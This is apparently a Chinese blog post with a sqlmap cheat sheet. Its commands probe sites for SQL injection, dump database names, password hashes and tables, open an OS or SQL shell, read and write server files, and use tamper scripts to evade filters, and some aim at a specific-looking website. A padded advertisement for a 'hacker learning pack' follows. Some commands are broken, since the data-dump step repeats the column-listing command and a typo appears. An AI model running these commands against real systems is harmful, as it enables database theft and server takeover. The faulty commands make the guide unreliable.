sqlmap简单使用
-
- 1、 注入点探测
-
- 正常get,post请求探测
- 目录型参数探测
- 2、拖库
1、 注入点探测
正常get,post请求探测
#监测get
sqlmap -u "https://www.haifong.org/search?key=1"
#设置注入参数,可以是get参数,也可以是请求头
python sqlmap.py -u "url" -p "id,user-agent"
#跳过某些参数的探测 --skip参数
python sqlmap.py -u "url" --skip "id,user-agent"
#探测post,让他自己找参数
sqlmap -u "url" --form --batch
#指定探测post参数
sqlmap -u "url" --data="抓包抓到的post数据" -p 指定的post参数
#使用-r参数,抓一个数据包并将数据爆保存到文件里,get,post请求通用
sqlmap -r 文件名
#判断cookie里有没有,可以使用--cookie
#在虚拟机中,使用主机代理网络(注意首先需要开启clash的允许局域网访问)
sqlmap -u "https://www.haifong.org/search?key=1" --proxy=http://192.168.240.1:7890
目录型参数探测
#sqlmap 支持直接对目录型参数进行探测,只需将注入点用 * 标记。
http://example.com/item/category/123/
sqlmap -u "http://example.com/item/category/123*/"
2、拖库
设置探测级别:
--level
获取库名
sqlmap -u url --current-db --batch
获取数据库密码:
sqlmap -u url --batch --password
获取字段名:
sqlmap -u url --batch -D 数据苦命 -T 表名 --columns
获取数据:
sqlmap -u url --batch -D 数据苦命 -T 表名 --columns
拿shell:
sqlmap -u url --os-shell
sqlmpa -u url --sql-shell #拿到这个shell,只能执行查询语句
上传文件:
#下载文件
sqlmap -u url --file-read 文件绝对路径 -v #-v查看详细信息,可以看到它使用的sql语句
#上传文件
sqlmap -u url --file-write 本地文件路径 --file-dest 上传的文件名
绕过脚本:
sqlmap自带了六十几个tamper
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
